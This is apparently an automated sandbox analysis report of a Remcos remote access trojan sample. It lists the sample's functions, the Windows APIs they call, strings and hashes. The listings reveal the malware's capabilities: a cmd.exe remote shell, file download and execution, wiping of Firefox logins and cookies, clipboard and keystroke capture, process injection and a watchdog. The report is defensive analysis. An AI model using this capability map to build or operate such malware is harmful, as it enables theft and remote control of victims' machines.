                                        • API String ID: 1279760036-0
                                        • Opcode ID: 382123f4ff15faebfb065adfee4593ee0e25617df91b7722ec70fd9da05ca189
                                        • Instruction ID: 9aef8a7b80d5ef8cde78cc1a95e43686bba12cbd10c6cd592e8946dff14ce016
                                        • Opcode Fuzzy Hash: 382123f4ff15faebfb065adfee4593ee0e25617df91b7722ec70fd9da05ca189
                                        • Instruction Fuzzy Hash: 54E0E5312012B5A7FB202A6A9C05F5B7688DB437A4F060033AC45D66D0CB58EC4181AF
                                        Function 00404262 Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Startup
                                        • String ID:
                                        • API String ID: 724789610-0
                                        • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                        • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                                        • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                        • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                                        Function 0042611E Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: send
                                        • String ID:
                                        • API String ID: 2809346765-0
                                        • Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                        • Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
                                        • Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                        • Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36

                                        Non-executed Functions

                                        Function 00406F06 Relevance: 48.1, APIs: 10, Strings: 17, Instructions: 849filesleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetEvent.KERNEL32(?,?), ref: 00406F28
                                        • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                        • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                          • Part of subcall function 0041B43F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B499
                                          • Part of subcall function 0041B43F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4CB
                                          • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B51C
                                          • Part of subcall function 0041B43F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B571
                                          • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B578
                                          • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                          • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                          • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                          • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                          • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                          • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(00000328,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                          • Part of subcall function 00404468: SetEvent.KERNEL32(00000328,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                        • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                        • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                        • DeleteFileA.KERNEL32(?), ref: 004078CC
                                          • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                          • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                          • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                        • Sleep.KERNEL32(000007D0), ref: 00407976
                                        • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                          • Part of subcall function 0041BB87: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                        • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$TTF$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                        • API String ID: 2918587301-184849705
                                        • Opcode ID: d91289d3051c322bdd857101a0a8adc0020f2fb1390e52d7e39c11ee2c34041e
                                        • Instruction ID: 1bc88c7e1bb4371a25effcd92402389f4e4e7f2dfcf0a55fa2f5aa785e242239
                                        • Opcode Fuzzy Hash: d91289d3051c322bdd857101a0a8adc0020f2fb1390e52d7e39c11ee2c34041e
                                        • Instruction Fuzzy Hash: CC42A372A043005BC604F776C8979AF76A59F90718F40493FF946771E2EE3CAA09C69B
                                        Function 00405042 Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 280pipesleepfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __Init_thread_footer.LIBCMT ref: 0040508E
                                          • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
                                          • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
                                          • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                        • __Init_thread_footer.LIBCMT ref: 004050CB
                                        • CreatePipe.KERNEL32(00475D0C,00475CF4,00475C18,00000000,0046556C,00000000), ref: 0040515E
                                        • CreatePipe.KERNEL32(00475CF8,00475D14,00475C18,00000000), ref: 00405174
                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C28,00475CFC), ref: 004051E7
                                          • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
                                          • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
                                        • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                        • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                        • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                          • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                        • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                        • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                        • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                        • CloseHandle.KERNEL32 ref: 004053CD
                                        • CloseHandle.KERNEL32 ref: 004053D5
                                        • CloseHandle.KERNEL32 ref: 004053E7
                                        • CloseHandle.KERNEL32 ref: 004053EF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                        • String ID: (\G$SystemDrive$cmd.exe$p\G$p\G$p\G$p\G$p\G
                                        • API String ID: 3815868655-1274243119
                                        • Opcode ID: bf49341456b4085afcbe2274af5a1afd8befb6bfa4028430823d957bc0f49eac
                                        • Instruction ID: e174317c0cfdf92f2f57875e471bcaa01af682fbbee25a17085fe39bc952a1f7
                                        • Opcode Fuzzy Hash: bf49341456b4085afcbe2274af5a1afd8befb6bfa4028430823d957bc0f49eac
                                        • Instruction Fuzzy Hash: 97910971504705AFD701BB25EC45A2F37A8EB84344F50443FF94ABA2E2DABC9D448B6E
                                        Function 00410F36 Relevance: 35.2, APIs: 7, Strings: 13, Instructions: 238threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                          • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                          • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                          • Part of subcall function 004127D5: RegCloseKey.KERNEL32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                        • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                        • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                          • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                          • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                          • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                        • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                        • String ID: 0DG$Remcos restarted by watchdog!$TTF$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                        • API String ID: 65172268-329858390
                                        • Opcode ID: 8a2a67840985eedd0dbda374961972b5c6f523c752149b0273765c4031c1f616
                                        • Instruction ID: cd90af3caa6d69ca3e9ea8718b5663318d6259183dea3b669bddfb6979e5fbe1
                                        • Opcode Fuzzy Hash: 8a2a67840985eedd0dbda374961972b5c6f523c752149b0273765c4031c1f616
                                        • Instruction Fuzzy Hash: 9F718E316042415BC614FB32D8579AE77A4AED4718F40053FF582A21F2EF7CAA49C69F
                                        Function 0040B335 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 145fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                        • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                        • FindClose.KERNEL32(00000000), ref: 0040B517
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$CloseFile$FirstNext
                                        • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                        • API String ID: 1164774033-3681987949
                                        • Opcode ID: 16969a060028ea01768b3e7f8d1dd51863cff663cb6b33d182e29f9985d51af6
                                        • Instruction ID: 6ff196721abdd8e0f3db8d3f3c96df629808f1f9148939b99990ee587e15bfec
                                        • Opcode Fuzzy Hash: 16969a060028ea01768b3e7f8d1dd51863cff663cb6b33d182e29f9985d51af6
                                        • Instruction Fuzzy Hash: 31512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                        Function 0040B53A Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 130fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                        • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                        • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                        • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$Close$File$FirstNext
                                        • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                        • API String ID: 3527384056-432212279
                                        • Opcode ID: a9a1d2a1cd8360742623f5947b655a78589cbc9ba895ac191cc005815f72155e
                                        • Instruction ID: 007be0ece90fca0e9f39ea1f272cf2b8da877aadfcc1370f70eac597690c30d9
                                        • Opcode Fuzzy Hash: a9a1d2a1cd8360742623f5947b655a78589cbc9ba895ac191cc005815f72155e
                                        • Instruction Fuzzy Hash: A7414B319042196ACB14F7A1EC569EE7768EF21318F50017FF801B31E2EF399A45CA9E
                                        Function 0040E219 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 212processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                        • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                          • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                          • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                          • Part of subcall function 004127D5: RegCloseKey.KERNEL32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                        • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                        • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                        • API String ID: 726551946-3025026198
                                        • Opcode ID: dc1ad798a35d7444bbbbf078d0d444fc3737f63c90b642ee01f5359e624c1f46
                                        • Instruction ID: ff5f769c9d2eb9d60ee5c92f3007ac3329fe223f24fa54890becbfeace6a8f7f
                                        • Opcode Fuzzy Hash: dc1ad798a35d7444bbbbf078d0d444fc3737f63c90b642ee01f5359e624c1f46
                                        • Instruction Fuzzy Hash: 647182311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A919CA9A
                                        Function 004159C6 Relevance: 18.1, APIs: 12, Instructions: 80clipboardmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenClipboard.USER32 ref: 004159C7
                                        • EmptyClipboard.USER32 ref: 004159D5
                                        • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                        • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                        • CloseClipboard.USER32 ref: 00415A5A
                                        • OpenClipboard.USER32 ref: 00415A61
                                        • GetClipboardData.USER32(0000000D), ref: 00415A71
                                        • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                        • CloseClipboard.USER32 ref: 00415A89
                                          • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                        • String ID:
                                        • API String ID: 3520204547-0
                                        • Opcode ID: 115af58ca25ac982801086cc968099495571ae34f6290ed4f1dd44d177635a22
                                        • Instruction ID: 65deba99f03779ab530566add8b8501f772d12743f07501a5a0e0bdfe921cf26
                                        • Opcode Fuzzy Hash: 115af58ca25ac982801086cc968099495571ae34f6290ed4f1dd44d177635a22
                                        • Instruction Fuzzy Hash: 232183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                        Function 00418764 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 197COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 0$1$2$3$4$5$6$7
                                        • API String ID: 0-3177665633
                                        • Opcode ID: 749f6a55d273af1ff276c8e2e6441e457c328e07a3b13567bd2426039e935f4e
                                        • Instruction ID: 8a7243103da74f60d5bbefacb9012cb64624b509857c51ebf6f1776beea37390
                                        • Opcode Fuzzy Hash: 749f6a55d273af1ff276c8e2e6441e457c328e07a3b13567bd2426039e935f4e
                                        • Instruction Fuzzy Hash: EE61B470508301AEDB00EF21C862FEE77E4AF95754F40485EF591672E2DB78AA48C797
                                        Function 00409B10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 108keyboardthreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                        • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                        • GetKeyState.USER32(00000010), ref: 00409B5C
                                        • GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
                                        • ToUnicodeEx.USER32(0047414C,00000000,?,?,00000010,00000000,00000000), ref: 00409B8A
                                        • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                        • ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                        • String ID: X[G
                                        • API String ID: 1888522110-739899062
                                        • Opcode ID: 6b40a38aeadb85bfb73805397b44a8e398a18fbf7f02f723f5f91e0a6223020d
                                        • Instruction ID: b3d75429b008435a5e1dd269aa2dc422b6d7dab2ccd5499d38c457950c038251
                                        • Opcode Fuzzy Hash: 6b40a38aeadb85bfb73805397b44a8e398a18fbf7f02f723f5f91e0a6223020d
                                        • Instruction Fuzzy Hash: 7C318F72544308AFE700DF90EC45FDBBBECEB48715F00083ABA45961A1D7B5E948DBA6
                                        Function 00406764 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 55COMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT ref: 00406788
                                        • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
